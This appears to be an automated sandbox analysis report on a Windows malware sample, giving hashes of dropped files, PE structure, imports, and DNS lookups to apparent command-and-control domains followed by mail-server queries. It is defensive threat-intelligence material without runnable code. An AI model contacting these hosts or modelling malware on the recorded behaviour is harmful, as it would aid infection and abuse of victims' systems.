Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_noyvrmlc.kt4.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\is-0PU8C.tmp\1DCB.tmp

Process:	C:\Users\user\AppData\Local\Temp\1DCB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704512
Entropy (8bit):	6.496956945559699
Encrypted:	false
SSDEEP:	12288:ERObekMSkfohrPUs37uzHnA6zg5cIsalHERjUrNN/RQ9wgUT5EDExyc:2ObekrkfohrP337uzHnA6cHswHE/6gU3
MD5:	A7662827ECAEB4FC68334F6B8791B917
SHA1:	F93151DD228D680AA2910280E51F0A84D0CAD105
SHA-256:	05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
SHA-512:	E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-O8IMG.tmp\1DCB.tmp

Process:	C:\Users\user\AppData\Local\Temp\1DCB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	704512
Entropy (8bit):	6.496956945559699
Encrypted:	false
SSDEEP:	12288:ERObekMSkfohrPUs37uzHnA6zg5cIsalHERjUrNN/RQ9wgUT5EDExyc:2ObekrkfohrP337uzHnA6cHswHE/6gU3
MD5:	A7662827ECAEB4FC68334F6B8791B917
SHA1:	F93151DD228D680AA2910280E51F0A84D0CAD105
SHA-256:	05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
SHA-512:	E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................\|...................idata...%.......&...\|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\adjhisi

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	351232
Entropy (8bit):	6.7186882513308435
Encrypted:	false
SSDEEP:	6144:iWqT8rSppL91lleFBrRpwqjuFtsf8d3v+7I7z3hf3prKXqWU:ixT8+pp5D6ZRpwqj58d3v+7I7Dov
MD5:	3D1D5C95AB6C993ACAEDBB2C719079F1
SHA1:	CAB34A16BA3E97D16B717F3E8F17FACA89DE5132
SHA-256:	B32A4963411DA33C6793BE935E2191E029E60CCE9805AA93415189177936ABCA
SHA-512:	F04422116953B10C1E76D40CEC69A5C433808C98CC2D86CCFCA840AF894C5723361BE5D249C50766C9085A98ED64483CF976E8CC125FE070298732F704C97473
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................C.......R.......D.P...............X.....M.......S.......V.....Rich............PE..L.....[c.............................!............@.................................e..........................................P.......................................................................................(............................text............................... ..`.rdata...7.......8..................@..@.data....h...@...&.................@....hihonagA............P..............@....rsrc................T..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fjievdc

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	248887
Entropy (8bit):	7.999255389123953
Encrypted:	true
SSDEEP:	6144:CdDvFY8G/NPrc82v3J0WBAzy0jPrr4mYkPxjIRHJinoM9d42Nou:CdDtYbrIJoPG8cRpq42Nj
MD5:	044A46AABA8E5B2E375F3FAF429A51FA
SHA1:	3ED8581F3599C0F4913DAF8CA01320066D00F84B
SHA-256:	BC8FFAEEA836D8827F649EDAD4A36FFC26767476F45E584A252A096883BE7567
SHA-512:	9F365B75FC92E5BBB5795D3681AE6AB7DB648E31E4916F0138B94D5F467239744EE11A2C2C9C5253D0202523CC5B6889E0DC4D134FE130F29A18FC80A7368573
Malicious:	false
Preview:	..&5..G6....;f..;.....P.;..<..2.l...7....7W.'oD.x3.m_....8{6.TO...9.G.GK..k........a<....5....yE....~..>.\|.............(...Q...,.;}.qG[.=.UW.1...........1... .vuJ.$...d..+.d...!.B..\|.ct.?m.R.>.Z.Lk<x.{$+..h..tzoYw..U....3;....".s..t.......n.9.lr.q.WA.=.GS3<.\|m..P.....G%B.Z.d~f.....:g....O!....2~.ug.......}....%..............A..b.6..+...Yx....,a.....o.X..>}. .d..Bfz0...J%..bbv... _.\..........Y...#.k.w....+.I..S.G.,............t..G.F...1J.c..R....j...#H..H<>[.(...}%...s.......s.....\|8..H...q...>Qo_"^.W6H4...6....(M.8...Q{\|...'].%Ic.W!<..../.I.o.lF.....$...X...P.. ....U.E.G...E..D3en..7n.?^....W.I.Q.N.6.o..;..O.........l.7..NuFn.V6Fe..l....#?..i(d..ah@....X....=n.3..3j.........a.....R..w..".SPX.V.[....._...#y#....'.L.sb6.a'....i.......5..7...............N:..[,oEK?....hiY.....h.eP.....Z...sFG...X9. .;.:....Oc.B{...t..3..!.UM...;.t....K..w..A.$X=.{.$.4...\.\...WZJJl......<.........>.@N/.....7i!.=.S<...:0..6.e.Ao...._g$...!.....

C:\Users\user\AppData\Roaming\ibjhisi

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	351744
Entropy (8bit):	6.720365230543579
Encrypted:	false
SSDEEP:	6144:OWqT8rSppL91lleFBrRpwKIe4f8Hfna7I7z3hf3prKXqWU:OxT8+pp5D6ZRpwKIP8Hfna7I7Dov
MD5:	C03FD7D0315EACAE0CF170692FCF1F2F
SHA1:	499A646CD85B17C4C02C1C5B60FBF7B09C2EB7AD
SHA-256:	06C0877EDF7076F1D18B6D6A0DFE5E1A28E909CFBFB5868C36F5E0C7B4AD6082
SHA-512:	F757F47C8A50B537AA1B36FBB1536FA32D114CE51A08A4D058D27E644762557BDBF8F3A483593645A8348332E19B3BFCB93C24209CAF80286627E207B39BE0CC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 35%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................C.......R.......D.P...............X.....M.......S.......V.....Rich............PE..L......b.............................!............@.................................#N.......................................*..P.......................................................................................(............................text............................... ..`.rdata...7.......8..................@..@.data....h...@...&...,..............@....jeveze.A............R..............@....rsrc................V..............@..@........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\ibjhisi:Zone.Identifier

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.720365230543579
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xqz8sQ4mZB.exe
File size:	351'744 bytes
MD5:	c03fd7d0315eacae0cf170692fcf1f2f
SHA1:	499a646cd85b17c4c02c1c5b60fbf7b09c2eb7ad
SHA256:	06c0877edf7076f1d18b6d6a0dfe5e1a28e909cfbfb5868c36f5e0c7b4ad6082
SHA512:	f757f47c8a50b537aa1b36fbb1536fa32d114ce51a08a4d058d27e644762557bdbf8f3a483593645a8348332e19b3bfcb93c24209caf80286627e207b39be0cc
SSDEEP:	6144:OWqT8rSppL91lleFBrRpwKIe4f8Hfna7I7z3hf3prKXqWU:OxT8+pp5D6ZRpwKIP8Hfna7I7Dov
TLSH:	F8748D5072E2D033EAE318358574C7B70A7B78725929558FA6E42F697F703E1A720F0A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................C.......R.......D.P...............X.....M.......S.......V.....Rich............PE..L......b...................

File Icon


Icon Hash:	0b3164646d311f46

Static PE Info

General

Entrypoint:	0x40211a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x62BDA615 [Thu Jun 30 13:33:09 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	a8fed6536d3881a9a4190496ecec9b06

Entrypoint Preview

Instruction
call 00007F4938EA15A0h
jmp 00007F4938E97BAEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00436468h], eax
mov dword ptr [00436464h], ecx
mov dword ptr [00436460h], edx
mov dword ptr [0043645Ch], ebx
mov dword ptr [00436458h], esi
mov dword ptr [00436454h], edi
mov word ptr [00436480h], ss
mov word ptr [00436474h], cs
mov word ptr [00436450h], ds
mov word ptr [0043644Ch], es
mov word ptr [00436448h], fs
mov word ptr [00436444h], gs
pushfd
pop dword ptr [00436478h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0043646Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [00436470h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0043647Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [004363B8h], 00010001h
mov eax, dword ptr [00436470h]
mov dword ptr [0043636Ch], eax
mov dword ptr [00436360h], C0000409h
mov dword ptr [00436364h], 00000001h
mov eax, dword ptr [00434008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0043400Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [00000004h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x32aec	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x207e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x30000	0x228	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2efa6	0x2f000	False	0.6164862450132979	data	7.043948347670188	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x30000	0x37a8	0x3800	False	0.3936244419642857	data	5.476290933215861	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x34000	0x681c	0x2600	False	0.21792763157894737	data	2.3499448152924685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.jeveze	0x3b000	0x241	0x400	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c000	0x207e8	0x20800	False	0.5752403846153846	data	6.005624886361031	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x57a68	0x2	data	Tatar	Russia	5.0
AFX_DIALOG_LAYOUT	0x57a70	0x2	data	Tatar	Russia	5.0
PERETIKIJEGUKOGORUZESOJEKUJECE	0x56e28	0xbf6	ASCII text, with very long lines (3062), with no line terminators	Tatar	Russia	0.5996080992815154
RT_CURSOR	0x57a78	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	Tatar	Russia	0.43506493506493504
RT_CURSOR	0x57bc8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.30810234541577824
RT_CURSOR	0x58a70	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.48014440433212996
RT_ICON	0x3cd40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tatar	Russia	0.7945590994371482
RT_ICON	0x3de00	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.4538912579957356
RT_ICON	0x3eca8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.5970216606498195
RT_ICON	0x3f550	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tatar	Russia	0.673963133640553
RT_ICON	0x3fc18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tatar	Russia	0.7565028901734104
RT_ICON	0x40180	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tatar	Russia	0.5820539419087137
RT_ICON	0x42728	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tatar	Russia	0.6418855534709194
RT_ICON	0x437d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tatar	Russia	0.7323770491803279
RT_ICON	0x44158	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tatar	Russia	0.7881205673758865
RT_ICON	0x44638	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.4680170575692964
RT_ICON	0x454e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.6385379061371841
RT_ICON	0x45d88	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tatar	Russia	0.7137096774193549
RT_ICON	0x46450	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tatar	Russia	0.7796242774566474
RT_ICON	0x469b8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tatar	Russia	0.6439834024896266
RT_ICON	0x48f60	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tatar	Russia	0.7614754098360655
RT_ICON	0x498e8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tatar	Russia	0.849290780141844
RT_ICON	0x49db8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tatar	Russia	0.4261727078891258
RT_ICON	0x4ac60	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tatar	Russia	0.5388086642599278
RT_ICON	0x4b508	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tatar	Russia	0.5691244239631337
RT_ICON	0x4bbd0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tatar	Russia	0.6148843930635838
RT_ICON	0x4c138	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tatar	Russia	0.5103734439834025
RT_ICON	0x4e6e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tatar	Russia	0.5905253283302064
RT_ICON	0x4f788	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tatar	Russia	0.6213114754098361
RT_ICON	0x50110	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tatar	Russia	0.6640070921985816
RT_ICON	0x505f0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tatar	Russia	0.4005863539445629
RT_ICON	0x51498	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tatar	Russia	0.5798736462093863
RT_ICON	0x51d40	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tatar	Russia	0.6238479262672811
RT_ICON	0x52408	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tatar	Russia	0.6423410404624278
RT_ICON	0x52970	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tatar	Russia	0.6716804979253111
RT_ICON	0x54f18	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tatar	Russia	0.7183395872420263
RT_ICON	0x55fc0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tatar	Russia	0.7319672131147541
RT_ICON	0x56948	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tatar	Russia	0.7792553191489362
RT_DIALOG	0x59520	0x96	data	Tatar	Russia	0.7533333333333333
RT_STRING	0x595b8	0x2c4	data	Tatar	Russia	0.4830508474576271
RT_STRING	0x59880	0x370	data	Tatar	Russia	0.4625
RT_STRING	0x59bf0	0x30e	data	Tatar	Russia	0.4961636828644501
RT_STRING	0x59f00	0x56e	data	Tatar	Russia	0.4510791366906475
RT_STRING	0x5a470	0x61e	data	Tatar	Russia	0.4425287356321839
RT_STRING	0x5aa90	0x45a	data	Tatar	Russia	0.4605026929982047
RT_STRING	0x5aef0	0xd0	data	Tatar	Russia	0.5480769230769231
RT_STRING	0x5afc0	0x4c6	data	Tatar	Russia	0.4541734860883797
RT_STRING	0x5b488	0xf0	data	Tatar	Russia	0.55
RT_STRING	0x5b578	0x69e	data	Tatar	Russia	0.43211334120425027
RT_STRING	0x5bc18	0x55a	data	Tatar	Russia	0.44233576642335765
RT_STRING	0x5c178	0x3ba	AmigaOS bitmap font "e", fc_YSize 29952, 22528 elements, 2nd "a", 3rd "n"	Tatar	Russia	0.46540880503144655
RT_STRING	0x5c538	0x2ae	data	Tatar	Russia	0.4606413994169096
RT_ACCELERATOR	0x57a20	0x38	data	Tatar	Russia	0.9107142857142857
RT_GROUP_CURSOR	0x57bb0	0x14	Lotus unknown worksheet or configuration, revision 0x1	Tatar	Russia	1.3
RT_GROUP_CURSOR	0x59318	0x22	data	Tatar	Russia	1.0294117647058822
RT_GROUP_ICON	0x3dde8	0x14	data	Tatar	Russia	1.1
RT_GROUP_ICON	0x445c0	0x76	data	Tatar	Russia	0.6694915254237288
RT_GROUP_ICON	0x49d50	0x68	data	Tatar	Russia	0.7019230769230769
RT_GROUP_ICON	0x50578	0x76	data	Tatar	Russia	0.6694915254237288
RT_GROUP_ICON	0x56db0	0x76	data	Tatar	Russia	0.6779661016949152
RT_VERSION	0x59340	0x1dc	data	Tatar	Russia	0.5819327731092437
None	0x57a58	0xa	data	Tatar	Russia	1.8

Imports

DLL	Import
KERNEL32.dll	MoveFileExW, CreateJobObjectW, SetHandleInformation, GetProfileStringW, FreeEnvironmentStringsA, SetTapeParameters, GetCompressedFileSizeW, GetPriorityClass, GetVolumePathNameW, GlobalAlloc, GetConsoleAliasExesLengthW, GetFileAttributesA, IsDBCSLeadByte, GetModuleFileNameW, lstrcatA, ExitThread, GetDevicePowerState, SetConsoleTitleA, GetLastError, GetCurrentDirectoryW, GetLongPathNameW, LoadResource, EnterCriticalSection, DisableThreadLibraryCalls, GetAtomNameA, LoadLibraryA, OpenWaitableTimerW, WritePrivateProfileStringA, SetConsoleDisplayMode, AddAtomW, DeviceIoControl, GetModuleHandleA, QueryMemoryResourceNotification, FreeEnvironmentStringsW, VirtualProtect, SetFileShortNameA, LocalSize, LocalFree, SetFileAttributesW, CopyFileExA, SetEnvironmentVariableA, CompareStringW, WriteConsoleOutputCharacterW, SetFilePointer, SetDefaultCommConfigA, GetTempFileNameW, GetEnvironmentVariableW, LocalLock, GetFullPathNameW, GetModuleHandleW, Sleep, GetProcAddress, ExitProcess, GetStartupInfoW, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, LeaveCriticalSection, RtlUnwind, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, WriteFile, GetStdHandle, GetModuleFileNameA, DeleteCriticalSection, FatalAppExitA, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, InitializeCriticalSectionAndSpinCount, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, MultiByteToWideChar, CloseHandle, CreateFileA, HeapSize, GetLocaleInfoW, GetLocaleInfoA, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, FlushFileBuffers, ReadFile, SetEndOfFile, GetProcessHeap, GetTimeZoneInformation, CompareStringA, RaiseException
USER32.dll	GetProcessDefaultLayout
ADVAPI32.dll	ReadEventLogA, IsValidSid, GetPrivateObjectSecurity, RegRestoreKeyW, PrivilegedServiceAuditAlarmA, GetServiceKeyNameA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tatar	Russia

Network Behavior

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 22, 2023 21:12:15.233361959 CET	192.168.2.4	1.1.1.1	0x410	Standard query (0)	onualituyrs.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:15.365633965 CET	192.168.2.4	1.1.1.1	0x4fc0	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:16.043416977 CET	192.168.2.4	1.1.1.1	0x4f15	Standard query (0)	snukerukeutit.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:17.137855053 CET	192.168.2.4	1.1.1.1	0x9c99	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:18.537575006 CET	192.168.2.4	1.1.1.1	0x2bf1	Standard query (0)	liuliuoumumy.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:20.501477003 CET	192.168.2.4	1.1.1.1	0x1eff	Standard query (0)	stualialuyastrelia.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:28.192560911 CET	192.168.2.4	1.1.1.1	0x563a	Standard query (0)	opposesicknessopw.pw	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:28.329731941 CET	192.168.2.4	1.1.1.1	0xe5fa	Standard query (0)	dayfarrichjwclik.fun	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:28.462697983 CET	192.168.2.4	1.1.1.1	0xe0c0	Standard query (0)	neighborhoodfeelsa.fun	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:29.114412069 CET	192.168.2.4	1.1.1.1	0x8eca	Standard query (0)	diagramfiremonkeyowwa.fun	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:31.992810011 CET	192.168.2.4	1.1.1.1	0x6060	Standard query (0)	ftpvoyager.cc	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:32.712671041 CET	192.168.2.4	1.1.1.1	0x51d1	Standard query (0)	tablesockartfinewa.pw	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:32.992075920 CET	192.168.2.4	1.1.1.1	0x6060	Standard query (0)	ftpvoyager.cc	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:33.540780067 CET	192.168.2.4	1.1.1.1	0xdbdd	Standard query (0)	dayfarrichjwclik.fun	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.004390001 CET	192.168.2.4	1.1.1.1	0x6060	Standard query (0)	ftpvoyager.cc	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:37.303977013 CET	192.168.2.4	1.1.1.1	0x83c9	Standard query (0)	shpilliwilli.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:38.302268028 CET	192.168.2.4	1.1.1.1	0xe595	Standard query (0)	linkofstrumble.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:42.567960978 CET	192.168.2.4	1.1.1.1	0x9db	Standard query (0)	cream.hitsturbo.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.158613920 CET	192.168.2.4	1.1.1.1	0x215b	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:48.944505930 CET	192.168.2.4	1.1.1.1	0xb7f8	Standard query (0)	saltdelcolom.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.944506884 CET	192.168.2.4	1.1.1.1	0xc22e	Standard query (0)	e-manage.us	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.944956064 CET	192.168.2.4	1.1.1.1	0xc84a	Standard query (0)	conquestaccounting.com.au	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.945030928 CET	192.168.2.4	1.1.1.1	0x6b0b	Standard query (0)	mobile.baihe.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.946530104 CET	192.168.2.4	1.1.1.1	0x99c7	Standard query (0)	bethanyhomesnc.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.951147079 CET	192.168.2.4	1.1.1.1	0x2931	Standard query (0)	integral-tours.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.951263905 CET	192.168.2.4	1.1.1.1	0xbcbc	Standard query (0)	mobileuser.baihe.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.952212095 CET	192.168.2.4	1.1.1.1	0x4233	Standard query (0)	hodginssmithconsulting.com	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.952290058 CET	192.168.2.4	1.1.1.1	0x3d11	Standard query (0)	hoefakker.org	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.952477932 CET	192.168.2.4	1.1.1.1	0xb12c	Standard query (0)	pcfocus.com.hk	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:48.952687979 CET	192.168.2.4	1.1.1.1	0x4941	Standard query (0)	geis.com.au	MX (Mail exchange)	IN (0x0001)	false
